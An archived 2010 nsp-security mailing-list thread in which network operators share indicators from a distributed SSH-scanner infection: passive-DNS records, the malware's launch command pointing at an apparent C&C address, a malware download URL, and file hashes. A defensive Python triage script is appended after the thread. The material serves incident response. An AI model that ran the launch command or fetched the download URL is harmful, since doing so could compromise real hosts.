[nsp-sec] distributed ssh scanners again
Barry Greene
bgreene at senki.org
Wed Nov 3 14:15:54 EDT 2010
Here is what I'm seeing via pDNS on these two systems:
Found 10 RRs in 0.55 seconds.
bos.zt.ua. A 195.69.220.2
impuls.net.ua. A 195.69.220.2
impuls.zhitomir.ua. A 195.69.220.2
impuls.zt.ua. A 195.69.220.2
ns1.impuls.net.ua. A 195.69.220.2
test.zt.ua. A 195.69.220.2
www.kino.zt.ua. A 195.69.220.2
zhitomir.ua. A 195.69.220.2
zt.net.ua. A 195.69.220.2
zt.ua. A 195.69.220.2
Found 7 RRs in 0.56 seconds.
120.fastwebserver.de. A 217.79.181.30
domainsex.de. A 217.79.181.30
mail.opel-edv.de. A 217.79.181.30
mail.testamentsvollstreckungen.net. A 217.79.181.30
mail.wege-immobilien.de. A 217.79.181.30
opel-edv.de. A 217.79.181.30
wege-immobilien.de. A 217.79.181.30
On Nov 3, 2010, at 9:13 AM, Torsten Voss wrote:
> ----------- nsp-security Confidential --------
> I thought so too, but there was no phpmyadmin installed on the system. It is not
> clear which vulnerability was used.
>
> Sure, you can share the information with your customers.
>
> Cheers,
> Torsten
>
> On 03.11.2010 17:04, Smith, Donald wrote:
>> Torsten, is it ok to share the fact that this is probably due to a vulnerable version of phpmyadmin internally and with customers?
>>
>>
>>
>> (coffee != sleep) & (!coffee == sleep)
>> Donald.Smith at qwest.com gcia
>>
>>> -----Original Message-----
>>> From: nsp-security-bounces at puck.nether.net
>>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
>>> Torsten Voss
>>> Sent: Wednesday, November 03, 2010 9:44 AM
>>> To: nsp-security at puck.nether.net
>>> Subject: Re: [nsp-sec] distributed ssh scanners again
>>>
>> Hi,
>>
>> we've received the malware from a compromised system:
>>
>> The malware was started similarly to the last one in summer:
>>
>> PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300
>> 217.79.190.53 2 2>/dev/null >/dev/null
>>
>> 217.79.190.53 is probably the C&C server for the distributed ssh scans
>>
>> The initial malware was probably downloaded at
>> http://195.69.220.2/a.txt
>>
>> Three files were found:
>> 60ccf6902bcc37550954383be1461041 barbut
>> 3f25289959d9fecc72cf24d2e300c97b dd_ssh
>> 30a1e1ae9d573b2daceb71f9ec8c0ce8 dtdss
>>
>> IP 195.69.220.2 is hardcoded in the dtdss file
>> IP 217.79.181.30 is included in the barbut file
>>
>> If someone would like a copy, please send us an email.
>>
>> Kind regards,
>> Torsten, AS680
>>
>>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> Please do not Forward, CC, or BCC this E-mail outside of the
> nsp-security
> community. Confidentiality is essential for effective
> Internet security counter-measures.
> _______________________________________________
> --
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634
>
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone +49 40 808077-590
> Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.: DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
>
> Automatische Warnmeldungen https://www.cert.dfn.de/autowarn
>
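As an added defender-side example (not part of the thread or any poster's tooling), the following Python script applies the two checks the thread implies: it flags processes launched from /tmp with a bare IPv4 argument, the shape of the `/tmp/dd_ssh 300 217.79.190.53 2` launch line Torsten quoted, and it groups passive-DNS A records by the addresses reported in the thread, the way Barry's pDNS lookups did. The process listing and the pDNS lines are constructed sample input; the three watched IPs are the ones from the thread.

```python
"""Triage helpers for the dd_ssh incident discussed on the list.
Constructed example: the sample data below is not from a real host."""
import re
from collections import defaultdict

# The three addresses reported in the thread (C&C plus the two hardcoded IPs).
REPORTED_IPS = {"217.79.190.53", "195.69.220.2", "217.79.181.30"}

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
# One pDNS line in the thread's shape: "<name>. A <address>"
PDNS_LINE = re.compile(r"^(\S+)\.\s+A\s+(\S+)$")


def suspicious_processes(ps_lines):
    """Return (pid, argv) for processes whose binary lives under /tmp and
    which take a bare IPv4 address as an argument (the dd_ssh launch shape)."""
    hits = []
    for line in ps_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        pid, argv = parts[0], parts[1:]
        if argv[0].startswith("/tmp/") and any(IPV4.match(a) for a in argv[1:]):
            hits.append((pid, " ".join(argv)))
    return hits


def domains_by_ip(pdns_lines, watch_ips):
    """Group pDNS A records by address, keeping only addresses in watch_ips."""
    groups = defaultdict(set)
    for line in pdns_lines:
        m = PDNS_LINE.match(line.strip())
        if m and m.group(2) in watch_ips:
            groups[m.group(2)].add(m.group(1))
    return dict(groups)


# Constructed sample input shaped like `ps -eo pid,args` output.
SAMPLE_PS = [
    "1 /sbin/init",
    "812 /usr/sbin/sshd -D",
    "2231 /tmp/dd_ssh 300 217.79.190.53 2",
    "2240 /usr/bin/curl http://example.invalid/",
]
# Constructed sample pDNS lines in the same shape as the thread's listing.
SAMPLE_PDNS = [
    "zt.ua. A 195.69.220.2",
    "opel-edv.de. A 217.79.181.30",
    "www.example.invalid. A 203.0.113.9",
]

if __name__ == "__main__":
    print(suspicious_processes(SAMPLE_PS))
    print(domains_by_ip(SAMPLE_PDNS, REPORTED_IPS))
```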